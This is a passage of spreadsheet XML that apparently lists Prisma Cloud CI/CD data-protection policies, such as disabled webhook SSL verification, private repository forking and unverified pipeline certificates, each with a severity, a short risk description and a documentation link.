      <c r="V160" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W160" t="inlineStr">
        <is>
          <t>SSL Verification is disabled for a project webhook, which instructs GitLab to not verify the identity of the remote server. The lack of verification enables attackers to perform a Man In The Middle attack, and to expose the transmitted data.</t>
        </is>
      </c>
      <c r="X160" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-proj-webhook-ssl-verif-disabled</t>
        </is>
      </c>
      <c r="Y160" t="inlineStr"/>
      <c r="Z160" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA160" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB160" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC160" t="inlineStr"/>
      <c r="AD160" t="b">
        <v>1</v>
      </c>
      <c r="AE160" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF160" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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0" t="inlineStr">
        <is>
          <t>9ceb3e83-195f-4582-8f66-0bd0a63b5a00</t>
        </is>
      </c>
      <c r="AI160" t="inlineStr"/>
      <c r="AJ160" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK160" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" t="inlineStr"/>
      <c r="B161" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C161" s="2" t="inlineStr"/>
      <c r="D161" t="inlineStr"/>
      <c r="E161" t="inlineStr"/>
      <c r="F161" t="inlineStr"/>
      <c r="G161" t="b">
        <v>1</v>
      </c>
      <c r="H1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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J161" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K161" t="inlineStr">
        <is>
          <t>GitHub organization webhook SSL verification is disabled</t>
        </is>
      </c>
      <c r="L161" t="inlineStr"/>
      <c r="M161" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N161" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O161" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P161" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q161" t="inlineStr"/>
      <c r="R161" t="inlineStr"/>
      <c r="S161" t="inlineStr"/>
      <c r="T161" t="b">
        <v>0</v>
      </c>
      <c r="U161" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V161" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W161" t="inlineStr">
        <is>
          <t>SSL Verification is disabled for an organization webhook, which instructs GitHub to not verify the identity of the remote server. The lack of verification can enable attackers to perform a Man In The Middle attack, and to expose the transmitted data.</t>
        </is>
      </c>
      <c r="X161" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-org-webhook-ssl-verif-disabled</t>
        </is>
      </c>
      <c r="Y161" t="inlineStr"/>
      <c r="Z161" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA161" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB161" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC161" t="inlineStr"/>
      <c r="AD161" t="b">
        <v>1</v>
      </c>
      <c r="AE161" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF161" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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1" t="inlineStr">
        <is>
          <t>76d97e87-19a4-4fd3-9b7e-13b0ea693b95</t>
        </is>
      </c>
      <c r="AI161" t="inlineStr"/>
      <c r="AJ161" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK161" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" t="inlineStr"/>
      <c r="B162" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C162" s="2" t="inlineStr"/>
      <c r="D162" t="inlineStr"/>
      <c r="E162" t="inlineStr"/>
      <c r="F162" t="inlineStr"/>
      <c r="G162" t="b">
        <v>1</v>
      </c>
      <c r="H1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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J162" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K162" t="inlineStr">
        <is>
          <t>GitHub organization members can create public repositories</t>
        </is>
      </c>
      <c r="L162" t="inlineStr"/>
      <c r="M162" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N162" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O162" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P162" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q162" t="inlineStr"/>
      <c r="R162" t="inlineStr"/>
      <c r="S162" t="inlineStr"/>
      <c r="T162" t="b">
        <v>0</v>
      </c>
      <c r="U162" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V162" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W162" t="inlineStr">
        <is>
          <t>Organization members are allowed to create public repositories. This can lead to internal code being inadvertently exposed publicly, being accessible to external users.</t>
        </is>
      </c>
      <c r="X162" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/members-create-public-repos</t>
        </is>
      </c>
      <c r="Y162" t="inlineStr"/>
      <c r="Z162" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA162" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB162" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC162" t="inlineStr"/>
      <c r="AD162" t="b">
        <v>1</v>
      </c>
      <c r="AE162" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF162" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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2" t="inlineStr">
        <is>
          <t>1709555c-cf44-41ad-b880-a0927a0a1451</t>
        </is>
      </c>
      <c r="AI162" t="inlineStr"/>
      <c r="AJ162" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK162" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" t="inlineStr"/>
      <c r="B163" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C163" s="2" t="inlineStr"/>
      <c r="D163" t="inlineStr"/>
      <c r="E163" t="inlineStr"/>
      <c r="F163" t="inlineStr"/>
      <c r="G163" t="b">
        <v>1</v>
      </c>
      <c r="H1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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J163" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K163" t="inlineStr">
        <is>
          <t>Private repository forks can lead to code leakage in GitHub</t>
        </is>
      </c>
      <c r="L163" t="inlineStr"/>
      <c r="M163" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N163" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O163" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P163" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q163" t="inlineStr"/>
      <c r="R163" t="inlineStr"/>
      <c r="S163" t="inlineStr"/>
      <c r="T163" t="b">
        <v>0</v>
      </c>
      <c r="U163" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V163" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W163" t="inlineStr">
        <is>
          <t>Forking private repositories can compromise security as the fork destination may lack crucial security protocols such as 2FA or SAML authentication. This has a negative impact on security, and potentially, leaving code vulnerable to leakage.</t>
        </is>
      </c>
      <c r="X163" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-privaterepo-forks-leak-code</t>
        </is>
      </c>
      <c r="Y163" t="inlineStr"/>
      <c r="Z163" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA163" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB163" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC163" t="inlineStr"/>
      <c r="AD163" t="b">
        <v>1</v>
      </c>
      <c r="AE163" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF163" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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3" t="inlineStr">
        <is>
          <t>7a7ba813-63aa-4cbe-afbe-3a73e1e92589</t>
        </is>
      </c>
      <c r="AI163" t="inlineStr"/>
      <c r="AJ163" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK163" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" t="inlineStr"/>
      <c r="B164" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C164" s="2" t="inlineStr"/>
      <c r="D164" t="inlineStr"/>
      <c r="E164" t="inlineStr"/>
      <c r="F164" t="inlineStr"/>
      <c r="G164" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J164" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K164" t="inlineStr">
        <is>
          <t>GitHub Actions pipeline commands transmit data over an unencrypted channel</t>
        </is>
      </c>
      <c r="L164" t="inlineStr"/>
      <c r="M164" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N164" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O164" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P164" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q164" t="inlineStr"/>
      <c r="R164" t="inlineStr"/>
      <c r="S164" t="inlineStr"/>
      <c r="T164" t="b">
        <v>0</v>
      </c>
      <c r="U164" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V164" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W164" t="inlineStr">
        <is>
          <t>Pipeline commands transmitting data over an unencrypted layer such as HTTP allow attackers to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X164" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-cnds-transmitdata-unsecuredchannel</t>
        </is>
      </c>
      <c r="Y164" t="inlineStr"/>
      <c r="Z164" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA164" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB164" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC164" t="inlineStr"/>
      <c r="AD164" t="b">
        <v>1</v>
      </c>
      <c r="AE164" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF164" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>057d3660-3d01-46b8-ae14-f01be5e0b5cc</t>
        </is>
      </c>
      <c r="AI164" t="inlineStr"/>
      <c r="AJ164" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK164" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" t="inlineStr"/>
      <c r="B165" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C165" s="2" t="inlineStr"/>
      <c r="D165" t="inlineStr"/>
      <c r="E165" t="inlineStr"/>
      <c r="F165" t="inlineStr"/>
      <c r="G165" t="b">
        <v>1</v>
      </c>
      <c r="H1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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J165" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K165" t="inlineStr">
        <is>
          <t>Project service hook SSL verification is disabled</t>
        </is>
      </c>
      <c r="L165" t="inlineStr"/>
      <c r="M165" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N165" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O165" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P165" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q165" t="inlineStr"/>
      <c r="R165" t="inlineStr"/>
      <c r="S165" t="inlineStr"/>
      <c r="T165" t="b">
        <v>0</v>
      </c>
      <c r="U165" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V165" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W165" t="inlineStr">
        <is>
          <t>SSL Verification is disabled for a project service hook, which instructs Azure Repos to not verify the identity of the remote server. The lack of verification enables attackers to perform a Man In The Middle attack, and to expose the transmitted data.</t>
        </is>
      </c>
      <c r="X165" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-project-service-hook-ssl-ver-disabled</t>
        </is>
      </c>
      <c r="Y165" t="inlineStr"/>
      <c r="Z165" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA165" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB165" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC165" t="inlineStr"/>
      <c r="AD165" t="b">
        <v>1</v>
      </c>
      <c r="AE165" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF165" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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5" t="inlineStr">
        <is>
          <t>2134299a-2b9b-40f7-ab3b-4e5730690183</t>
        </is>
      </c>
      <c r="AI165" t="inlineStr"/>
      <c r="AJ165" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK165" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" t="inlineStr"/>
      <c r="B166" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C166" s="2" t="inlineStr"/>
      <c r="D166" t="inlineStr"/>
      <c r="E166" t="inlineStr"/>
      <c r="F166" t="inlineStr"/>
      <c r="G166" t="b">
        <v>1</v>
      </c>
      <c r="H1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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J166" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K166" t="inlineStr">
        <is>
          <t>BitBucket webhooks sent over unencrypted channel</t>
        </is>
      </c>
      <c r="L166" t="inlineStr"/>
      <c r="M166" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N166" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O166" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P166" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q166" t="inlineStr"/>
      <c r="R166" t="inlineStr"/>
      <c r="S166" t="inlineStr"/>
      <c r="T166" t="b">
        <v>0</v>
      </c>
      <c r="U166" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V166" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W166" t="inlineStr">
        <is>
          <t>The repository sends events to a webhook over an unencrypted layer. An attacker executing a man-in-the-middle attack can steal or modify the data sent to the webhook.</t>
        </is>
      </c>
      <c r="X166" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-webhooks-sent-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y166" t="inlineStr"/>
      <c r="Z166" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA166" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB166" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC166" t="inlineStr"/>
      <c r="AD166" t="b">
        <v>1</v>
      </c>
      <c r="AE166" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF166" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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6" t="inlineStr">
        <is>
          <t>9c118d86-cf44-4b27-b964-2f10a1a85610</t>
        </is>
      </c>
      <c r="AI166" t="inlineStr"/>
      <c r="AJ166" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK166" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" t="inlineStr"/>
      <c r="B167" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C167" s="2" t="inlineStr"/>
      <c r="D167" t="inlineStr"/>
      <c r="E167" t="inlineStr"/>
      <c r="F167" t="inlineStr"/>
      <c r="G167" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J167" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K167" t="inlineStr">
        <is>
          <t>Forking of GitLab private repository is allowed</t>
        </is>
      </c>
      <c r="L167" t="inlineStr"/>
      <c r="M167" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N167" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O167" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P167" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q167" t="inlineStr"/>
      <c r="R167" t="inlineStr"/>
      <c r="S167" t="inlineStr"/>
      <c r="T167" t="b">
        <v>0</v>
      </c>
      <c r="U167" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V167" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W167" t="inlineStr">
        <is>
          <t>Misconfiguration of private repositories may allow sensitive code to be inadvertently/intentionally leaked. A user account might fork the repository to another project, leading to leakage of code. It can also lead to the creation of pull requests from the forked repository to the original repository. This can lead to the execution of malicious code on the CI, even by users with read-only permissions on the original repository.</t>
        </is>
      </c>
      <c r="X167" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-fork-private-reo-allow</t>
        </is>
      </c>
      <c r="Y167" t="inlineStr"/>
      <c r="Z167" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA167" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB167" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC167" t="inlineStr"/>
      <c r="AD167" t="b">
        <v>1</v>
      </c>
      <c r="AE167" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF167" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>224fba7d-cd53-4858-9743-3591716297be</t>
        </is>
      </c>
      <c r="AI167" t="inlineStr"/>
      <c r="AJ167" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK167" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" t="inlineStr"/>
      <c r="B168" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C168" s="2" t="inlineStr"/>
      <c r="D168" t="inlineStr"/>
      <c r="E168" t="inlineStr"/>
      <c r="F168" t="inlineStr"/>
      <c r="G168" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J168" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K168" t="inlineStr">
        <is>
          <t>Forking of private repositories in the GitHub organization is allowed</t>
        </is>
      </c>
      <c r="L168" t="inlineStr"/>
      <c r="M168" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N168" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O168" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P168" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q168" t="inlineStr"/>
      <c r="R168" t="inlineStr"/>
      <c r="S168" t="inlineStr"/>
      <c r="T168" t="b">
        <v>0</v>
      </c>
      <c r="U168" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V168" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W168" t="inlineStr">
        <is>
          <t>Forking is permitted on private repositories within an organization, enabling users with 'read' permissions to fork a repository to another organization or user account. This could lead to a decrease in security as SAML SSO may not be mandatory for authentication when accessing a forked repository. Another security concern is that pull requests can be generated from forked repositories, which may result in a PPE attack.</t>
        </is>
      </c>
      <c r="X168" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-fork-private-repo-inorg-allowed</t>
        </is>
      </c>
      <c r="Y168" t="inlineStr"/>
      <c r="Z168" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA168" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB168" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC168" t="inlineStr"/>
      <c r="AD168" t="b">
        <v>1</v>
      </c>
      <c r="AE168" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF168" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>ec963458-c440-469e-9637-d759e3148e55</t>
        </is>
      </c>
      <c r="AI168" t="inlineStr"/>
      <c r="AJ168" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK168" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" t="inlineStr"/>
      <c r="B169" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C169" s="2" t="inlineStr"/>
      <c r="D169" t="inlineStr"/>
      <c r="E169" t="inlineStr"/>
      <c r="F169" t="inlineStr"/>
      <c r="G169" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J169" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K169" t="inlineStr">
        <is>
          <t>Certificate not verified by GitHub Actions pipeline command</t>
        </is>
      </c>
      <c r="L169" t="inlineStr"/>
      <c r="M169" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N169" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O169" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P169" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q169" t="inlineStr"/>
      <c r="R169" t="inlineStr"/>
      <c r="S169" t="inlineStr"/>
      <c r="T169" t="b">
        <v>0</v>
      </c>
      <c r="U169" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V169" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W169" t="inlineStr">
        <is>
          <t>Not verifying certificates through pipeline commands allows attackers to plant their own certificate and impersonate a server in order to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X169" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-cert-notverified-cipipeline</t>
        </is>
      </c>
      <c r="Y169" t="inlineStr"/>
      <c r="Z169" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA169" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB169" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC169" t="inlineStr"/>
      <c r="AD169" t="b">
        <v>1</v>
      </c>
      <c r="AE169" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF169" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>ef8916d7-f58a-47ac-99ab-0688762bbe28</t>
        </is>
      </c>
      <c r="AI169" t="inlineStr"/>
      <c r="AJ169" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK169" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" t="inlineStr"/>
      <c r="B170" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C170" s="2" t="inlineStr"/>
      <c r="D170" t="inlineStr"/>
      <c r="E170" t="inlineStr"/>
      <c r="F170" t="inlineStr"/>
      <c r="G170" t="b">
        <v>1</v>
      </c>
      <c r="H1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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J170" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K170" t="inlineStr">
        <is>
          <t>Certificate not verified by GitLab CI pipeline command</t>
        </is>
      </c>
      <c r="L170" t="inlineStr"/>
      <c r="M170" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N170" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O170" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P170" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q170" t="inlineStr"/>
      <c r="R170" t="inlineStr"/>
      <c r="S170" t="inlineStr"/>
      <c r="T170" t="b">
        <v>0</v>
      </c>
      <c r="U170" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V170" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W170" t="inlineStr">
        <is>
          <t>Not verifying certificates through pipeline commands allows attackers to plant their own certificate and impersonate a server in order to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X170" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-cert-notverified-cipipeline</t>
        </is>
      </c>
